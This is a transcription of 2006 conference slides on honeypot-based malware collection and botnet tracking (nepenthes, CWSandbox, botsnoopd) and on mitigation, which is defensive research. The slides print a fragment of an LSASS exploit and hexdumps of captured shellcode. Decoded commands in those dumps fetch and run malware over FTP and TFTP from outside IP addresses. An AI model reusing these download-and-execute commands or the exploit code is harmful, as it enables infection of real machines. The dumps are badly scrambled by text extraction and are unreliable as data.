Detecting, Tracking, and Mitigating Botnets

Transcription

Catching Malware
Detecting, Tracking, and Mitigating Botnets
Pi1 - Laboratory for Dependable Distributed Systems
http://mwcollect.org
Outline
• Motivation
• Tools & techniques to learn more about botnets
• nepenthes
• CWSandbox
• botsnoopd
• Results
Holz & Wicherski • Black Hat Japan 2006: Catching Malware
Motivation
• Botnet monitoring
• Find new botnets independently
• Bots spread like worms
• Observe infection and analyze bot to obtain
Command and Control (C&C) information
Botnet
Typical communication flow using central (IRC)
server for Command & Control (C&C)
Attacker
Bot
Bot
C&C
Server
5
3
1
m
o
dc
n
a
c
s
$adv
b
0
5
200
IRC
Bot
hax0r.example.com
3267/TCP
http://honeynet.org/papers/bots
Collecting Malware
Automatically Downloading
Malware Binaries
nepenthes
• Tool to automatically “collect” malware like bots
and other autonomous spreading malware
• Emulate known vulnerabilities and download
malware trying to exploit these vulnerabilities
• Available at http://nepenthes.mwcollect.org
Architecture
• Modular architecture
• Vulnerability modules
• Shellcode handler
• Download modules
• Submission modules
• Trigger events
• Shell-emulation and virtual filesystem
Schematic overview
Vulnerability modules
• Emulate vulnerable services
• Play with exploits until they send us
their payload (finite state machine)
• Currently more than 20 available
vulnerability modules
• More in development
• Analysis of known vulnerabilities &
exploits necessary
• Automation possible?
Example
• Emulation of MS04-011 (LSASS)
• Proof-of-Concept exploit from houseofdabus:
if (send(sockfd, req2, sizeof(req1)-1, 0) == -1)
{
printf("[-] Send failed\n");
exit(1);
}
len = recv(sockfd, recvbuf, 1600, 0);
if (send(sockfd, req3, sizeof(req2)-1, 0) == -1)
{
printf("[-] Send failed\n");
exit(1);
}
len = recv(sockfd, recvbuf, 1600, 0);
Example
• Answers from vuln-lsass (taken from mwcollectd)
case RPCS_GOT_LSASS_STAGE3:
{
unsigned char szBuffer[256];
for (unsigned int i = 0; i < sizeof(szBuffer); ++i)
szBuffer[i] = rand() % 0xFF;
m_pCollector->getNetworkInterface()->
sendData(iHandle, szBuffer, sizeof(szBuffer));
m_dsState = (rpc_state_t) ((unsigned int) m_dsState + 1);
}
Vulnerability modules
• vuln-dcom (MS03-039)
• vuln-lsass (MS04-011)
• vuln-asn1 (MS04-007)
• vuln-wins (MS04-045)
• vuln-{mssql,msdtc,msmq}
• vuln-{optix,kuang2,bagle,mydoom}
• vuln-veritas
• ...
Shellcode modules
• Automatically extract URL used by
malware to transfer itself to
compromised machine
• sch_generic_xor
• Generic XOR decoder
• sch_generic_createprocess
• sch_generic_url
• sch_generic_cmd
[ dia
[ dia
[ dia
[ dia
[ dia
[ dia
[ dia
[ dia
[...]
[ dia
[ dia
[ dia
[ dia
[ dia
[ dia
[ dia
[ dia
[ dia
[ dia
[ dia
[ dia
[ dia
[ dia
[ dia
[ dia
[ dia
[ dia
[ dia
[ dia
[ dia
[ dia
[ dia
]
]
]
]
]
]
]
]
=------------------[ hexdump(0x1bf7bb68 ,
0x0000 00 00 10 bf ff 53 4d 42 73 00 00
0x0010 00 00 00 00 00 00 00 00 00 00 00
0x0020 00 00 00 00 0c ff 00 00 00 04 11
0x0030 00 00 00 7e 10 00 00 00 00 d4 00
0x0040 82 10 7a 06 06 2b 06 01 05 05 02
0x0050 82 10 6a a1 82 10 66 23 82 10 62
0x0060 41 41 41 41 41 41 41 41 41 41 41
]
]
]
]
]
]
]
]
]
]
]
]
]
]
]
]
]
]
]
]
]
]
]
0x0450
0x0460
0x0470
0x0480
0x0490
0x04a0
0x04b0
0x04c0
0x04d0
0x04e0
0x04f0
0x0500
0x0510
0x0520
0x0530
0x0540
0x0550
0x0560
0x0570
0x0580
0x0590
0x05a0
0x05b0
0x000010c3)
00 00 18 07
00 00 00 37
0a 00 00 00
00 80 7e 10
a0 82 10 6e
03 82 04 01
41 41 41 41
cmd
41
41 /c
41 41 41 41 41 41 41 41 41 41 41
03 echo
00 23 82 open
0c 57 03
82 04 0a 00 90 42
84.178.54.239
42 90 42 81 c4 54 f2 ff ff fc e8 46 00
a ef
a 8b 4f 18 8b 5f
45 echo
3c 8b 7c user
05 78 01
e3 echo
2e 49 8b binary
34 8b 01 ee 31 c0 99 ac 84
c1 ca 0d 01 c2 eb f4 3b 54 24 04 75 e3
01 echo
eb 66 8b get
0c 4b svchosts.exe
8b 5f 1c 01 eb 8b 1c
89 echo
5c 24 04 bye
c3 31 c0 64 8b 40 30 85 c0
40 0c 8b 70 1c ad 8b 68 08 e9 0b 00 00
34 05 7c 00 00 00 8b 68 3c 5f 31 f6 60
68
ef -n
ce e0-v
60 -s:ii
68 98 fe & 8a 0e 57 ff e7
ftp
ff ff 63 6d 64 20 2f 63 20 65 63 68 6f
del ii &
65 6e 20 38 34 2e 31 37 38 2e 35 34 2e
20
svchosts.exe
36 32 30 31 20 3e 3e 20 69 69 20 26
6f 20 75 73 65 72 20 61 20 61 20 3e 3e
20 26 65 63 68 6f 20 62 69 6e 61 72 79
20 69 69 20 26 65 63 68 6f 20 67 65 74
63 68 6f 73 74 73 2e 65 78 65 20 3e 3e
20 26 65 63 68 6f 20 62 79 65 20 3e 3e
20 26 66 74 70 20 2d 6e 20 2d 76 20 2d
69 20 26 64 65 6c 20 69 69 20 26 73 76
73 74 73 2e 65 78 65 0d 0a 00 42 42 42
42 42 42 42 42 42 42 42 42 42 42 42 42
41 41
90>>
42
00 00
20>>
01
c0>>
74
8b 5f
8b>>
01
78>>
0f
00 8b
56 eb
e8 ee
20 6f
32 33
65 63
20 69
20 3e
20 73
20 69
20 69
73 3a
63 68
42 42
42 42
]-------------------=
c8 .....SMB s.......
13 ........ ......7.
00 ........ ........
60 ...~.... .....~.`
30 ..z..+.. ......n0
00 ..j...f# ..b.....
41 AAAAAAAA AAAAAAAA
41
90
ii
8b
ii
eb
07
ii
24
ii
eb
8b
ii
40
0d
ff
70
39
68
69
3e
76
69
69
69
6f
42
42
AAAAAAAA
..#..W..
&
B.B..T..
&
E<.|.x..
..I.4...
&
.......;
&
..f..K._
.\$..1.d
&
@..p...h
4.|....h
h...`h..
..cmd /c
en 84.17
6201 >>
o user a
&echo b
ii &ech
chosts.e
&echo b
&ftp -n
i &del i
sts.exe.
BBBBBBBB
ftp://a:[email protected]/svchosts.exe
AAAAAAAA
....B.B.
...F....
.O.._ ..
1.....t.
T$.u.._$
........
[email protected]..
.......@
<_1.`V..
..W.....
echo op
8.54.239
ii &ech
a >> ii
inary >>
o get sv
xe >> ii
ye >> ii
-v -s:i
i &svcho
..BBBBBB
BBBBBBBB
dia]
dia]
dia]
dia]
dia]
dia]
dia]
dia]
dia]
dia]
...]
dia]
dia]
dia]
dia]
dia]
dia]
dia]
dia]
dia]
dia]
dia]
dia]
dia]
dia]
dia]
dia]
dia]
dia]
dia]
dia]
dia]
dia]
=------------------[ hexdump(0x1c1b6210 ,
0x0000 47 45 54 20 2f 20 48 54 54 50 2f
0x0010 48 6f 73 74 3a XX XX XX XX XX XX
0x0020 XX XX XX XX 0d 0a 41 75 74 68 6f
0x0030 69 6f 6e 3a 20 4e 65 67 6f 74 69
0x0040 49 49 51 65 67 59 47 4b 77 59 42
0x0050 49 49 51 62 6a 43 43 45 47 71 68
0x0060 34 49 51 59 67 4f 43 42 41 45 41
0x0070 55 46 42 51 55 46 42 51 55 46 42
0x0080 55 46 42 51 55 46 42 51 55 46 42
0x00000800)
31 2e 30 0d
XX XX XX XX
72 69 7a 61
61 74 65 20
42 51 55 43
67 68 42 6d
51 55 46 42
51 55 46 42
51 55 46 42
]-------------------=
0a GET / HT TP/1.0..
XX Host: XX XXXXXXXX
74 XXXX..Au thorizat
59 ion: Neg otiate Y
6f IIQegYGK wYBBQUCo
49 IIQbjCCE GqhghBmI
51 4IQYgOCB AEAQUFBQ
51 UFBQUFBQ UFBQUFBQ
51 UFBQUFBQ UFBQUFBQ
0x05b0
0x05c0
0x05d0
0x05e0
0x05f0
0x0600
0x0610
0x0620
0x0630
0x0640
0x0650
0x0660
0x0670
0x0680
0x0690
0x06a0
0x06b0
0x06c0
0x06d0
0x06e0
0x06f0
0x0700
51
42
78
52
58
4d
77
41
48
69
48
4e
59
69
5a
49
4c
63
63
65
51
51
51
6b
2f
66
36
72
4f
69
36
68
61
41
44
2f
59
4e
4e
65
64
5a
51
51
55
51
45
2f
41
2b
49
31
77
34
63
41
41
57
2b
79
43
79
53
32
58
6b
46
4d
4b
2f
56
4d
54
51
78
6c
42
6a
41
6a
66
42
34
42
35
4e
68
4a
42
41
51
38
34
75
41
6b
4c
63
34
70
41
76
6f
30
78
48
6c
75
70
43
51
49
51
36
41
53
64
42
69
4a
44
43
69
7a
37
5a
4e
52
65
63
64
51
55
34
70
45
65
59
41
48
31
41
34
77
32
75
76
6e
6a
56
47
32
41
6b
46
49
42
59
2b
73
66
58
38
54
74
41
67
42
2f
52
6b
51
55
5a
42
4a
42
4d
43
41
4c
30
42
6a
63
44
41
41
38
67
2f
77
75
67
6d
30
43
43
51
56
6b
41
54
69
79
69
41
4d
44
41
58
61
2f
49
4d
64
63
65
51
51
55
77
45
41
78
77
67
31
65
63
49
49
7a
4a
32
43
54
32
33
53
6b
6b
46
4f
4b
43
69
48
30
38
75
42
74
74
48
6a
4e
31
63
4e
52
35
4a
4a
42
43
42
4c
4c
75
42
6b
4c
6b
77
41
32
2b
74
70
31
75
68
6c
43
43
55
41
46
54
79
63
75
65
49
30
4b
41
46
67
43
44
6a
32
6e
47
6b
6b
46
6f
54
79
41
43
76
74
73
41
32
56
62
35
41
45
45
5a
51
55
4a
4a
42
41
79
4c
42
5a
30
6d
42
77
4c
38
72
58
76
7a
32
30
67
6d
43
43
UFBQUFBQ
QMAI4IMV
EKQQpBCk
//86EYAA
AV4Ae+LT
+MuSYs0i
ITAdAfBy
1QkBHXji
wxLi18cA
4lcJATDM
cB4D4tAD
AjpCwAAA
AAAi2g8X
WjvzuBga
+fo7v///
yB0ZnRwI
C4xNjkuM
yBHRVQgd
S5leGUmc
2Nuc2Z0e
XhpdABCQ
kJCQkJCQ
UFBQUFBQ
wOCBAoAk
EKBxFTy/
ACLRTyLf
xiLXyAB6
wHuMcCZr
g0Bwuv0O
18kAetmi
euLHIsB6
cBki0Awh
ItwHK2La
ItANAV8A
zH2YFbrD
Jj+ig5X/
2NtZCAvY
C1pIDEzN
Tc1LjE2N
2Nuc2Z0e
3RhcnQgd
S5leGUmZ
kJCQkJCQ
kJCQkJCQ
cat asn1-iis.txt | cut -b 83- | sed "s/ //g" > asn1-iis.dec
mimencode -u asn1-iis.dec | hexdump -C
00000000
00000010
00000020
00000030
*
00000420
00000430
00000440
00000450
00000460
00000470
00000480
00000490
000004a0
000004b0
000004c0
000004d0
000004e0
000004f0
00000500
00000510
*
000005d0
60
30
00
41
82
82
41
41
10
10
41
41
7a
6a
41
41
06
a1
41
41
06
82
41
41
2b
10
41
41
06
66
41
41
01
23
41
41
05
82
41
41
05
10
41
41
41 03 00 23 82 0c 57 03 82 04 0a
90 42 90 42 81 c4 54 f2 ff ff fc
8bcmd
45 3c
/c8b 7c 05 78 01 ef 8b 4f
eb e3
2e 49-i8b134.169.175.167
34 8b 01 ee 31 c0
tftp
07 c1 ca 0d 01 c2 eb f4 3b 54 24
start wcnsfty.exe &
24 01 eb 66 8b 0c 4b 8b 5f 1c 01
ebexit
89 5c 24 04 c3 31 c0 64 8b 40
8b 40 0c 8b 70 1c ad 8b 68 08 e9
40 34 05 7c 00 00 00 8b 68 3c 5f
0d 68 ef ce e0 60 68 98 fe 8a 0e
ff ff ff 63 6d 64 20 2f 63 20 74
69 20 31 33 34 2e 31 36 39 2e 31
37 20 47 45 54 20 77 63 6e 73 66
65 26 73 74 61 72 74 20 77 63 6e
65 78 65 26 65 78 69 74 00 42 42
42 42 42 42 42 42 42 42 42 42 42
02
62
41
41
a0
03
41
41
82
82
41
41
10
04
41
41
6e
01
41
41
|`..z..+..... ..n|
|0..j¡..f#..b....|
|.AAAAAAAAAAAAAAA|
|AAAAAAAAAAAAAAAA|
00 90 42 90 42 |A..#..W......B.B|
e8 46 00 00 00 |.B.B.ÄTòÿÿüèF...|
18 8b 5f 20 01 |.E<.|.x.ï.O.._ .|
99 acwcnsfty.exe
84 c0 74 |ëã.I.4..î1À.¬.Àt|
GET
&
04 75 e3 8b 5f |.ÁÊ..Âëô;T$.uã._|
eb 8b 1c 8b 01 |$.ëf..K._..ë....|
30 85 c0 78 0f |ë.\$.Ã1Àd.@0.Àx.|
0b 00 00 00 8b |[email protected]..h.é.....|
31 f6 60 56 eb |@4.|....h<_1ö`Vë|
57 ff e7 e8 ee |.hïÎà`h.þ..Wÿçèî|
66 74 70 20 2d |ÿÿÿcmd /c tftp -|
37 35 2e 31 36 |i 134.169.175.16|
74 79 2e 65 78 |7 GET wcnsfty.ex|
73 66 74 79 2e |e&start wcnsfty.|
42 42 42 42 42 |exe&exit.BBBBBBB|
42 42 42 42 42 |BBBBBBBBBBBBBBBB|
tftp://134.169.175.167/wcnsfty.exe
Download modules
• download-{http,tftp}
• Handles HTTP / TFTP URIs
• download-ftp
• FTP client from Windows is not
RFC compliant...
• download-{csend,creceive}
• download-link
• link://10.0.0.1/HJ4G==
Submission modules
• submit-file
• Write file to hard disk
• submit-{mysql,postgres,mssql}
• Store file in database
• submit-norman
• Submit file to http://sandbox.norman.no
• submit-gotek
• Send file via G.O.T.E.K.
nepenthes-Demo
Thorsten Holz • Laboratory for Dependable Distributed Systems
UNIVERSITÄT MANNHEIM
mwcollect Alliance
https://alliance.mwcollect.org
Statistics: nepenthes
• Four months nepenthes on /18 network:
• 50,000,000+ files downloaded
• 14,000+ unique binaries based on md5sum
• ~1,000 different botnets
• Anti-virus engines detect between 70% and
90% of the binaries
• Korgobot/Padobot dominates
CWSandbox
Automatically Analyzing a
Collected binary
Overview
• Automatic behaviour analysis
• Execute the binary and observe what it is doing
• Similar to Norman Sandbox
• http://sandbox.norman.no
• Part of diploma thesis by Carsten Willems
• Currently stable beta version available
• Results look promising
http://www.cwsandbox.org
Windows API
Basics
• Schematic Overview of Windows API
Example
r more details about what is going on in NTOSKRNL.EXE.
DLL kernel32. For better understanding the instructions are logically split into
ks. Of course this is only done in the figure and has no semantics in the rea
first block marks the instructions, that will be overwritten by the JMP to our h
tion. The second block includes the instructions, that will be untouched by the
k.
API
hooking
by
Inline
Code
Overwriting
he lower port of the figure you can see what happens, when the hook is installe
Example
•
Inner working
• API hooking, Code Overwriting, and DLL injection
• Hooking of Win32 and Native API calls
• Tracing of functions for file access, process
access, Winsock communication, registry, ...
• Execution for three minutes, then processing of
results ➙ analysis log in XML format
Schematic overview
• CWSandbox & CWMonitor.dll
CWSandbox-Demo
Tracking Botnets
Observing a Botnet
Tracking Botnets
• Botnets can not impose authentication that is not
also encoded in the bot’s binary
• Usually, commands are flooded to all bots and
not selectively to specific bots
• Most botnets are usually so large that not all bots
are expected to respond to commands in time
➭ We can effectively subvert botnets by joining it
with our own snoop clients, without being
detected
Bot Impersonification
• Run bot binary on honeypot, observe from outside
• Better: Use existing software for control protocol
• For IRC-based botnets: irssi, mIRC, xchat, ...
• Even better: Implement generic bot emulation client
• botsnoopd
botsnoopd
• Daemon dedicated to snoop different kinds of
botnets
• Not limited to IRC, but also HTTP and others
• Modular design, extensible via plugins
• Uses libnetworkd for performance
• Scales to at least 100 botnets on single machine
• Will be released under GPL
Schematic Overview
emulate−genirc
proxy−socks4
proxy−http
client−irc
emulate−rbot
client−http
react−snortsam
client−nugache
react−asnmail
log−irc
log−postgres
log−file
Botnet-Demo
Botnet Mitigation
How to Stop Botnets?
Mitigation
• Change DNS entry
• hax0r.example.org should resolve to 127.0.0.1
• Block traffic at router
• All access to C&C IP should be monitored
• Take down C&C-Server
• Often cooperation needed
Conclusion
• Honeypot-based techniques can help us to learn
more about autonomous spreading malware
• With the help of automated capture and
analysis, we can efficiently detect botnets
• Local and global mitigation possible
• Needs more research, e.g., 0day-support
• More nepenthes sensors would be helpful ;-)
Thorsten Holz
Georg Wicherski
http://www-pi1.informatik.uni-mannheim.de/
[email protected]
http://pixel-house.net
[email protected]
More information:
http://mwcollect.org & http://honeyblog.org
Pi1 - Laboratory for Dependable Distributed Systems

Detecting, Tracking, and Mitigating Botnets

Transcription

Similar documents

DAY 1 - Thorsten Hol.. - Hack In The Box Security Conference

AllSchwadur

universität - DFN-CERT

Full Disclosure Report

Inhalt - DFN-CERT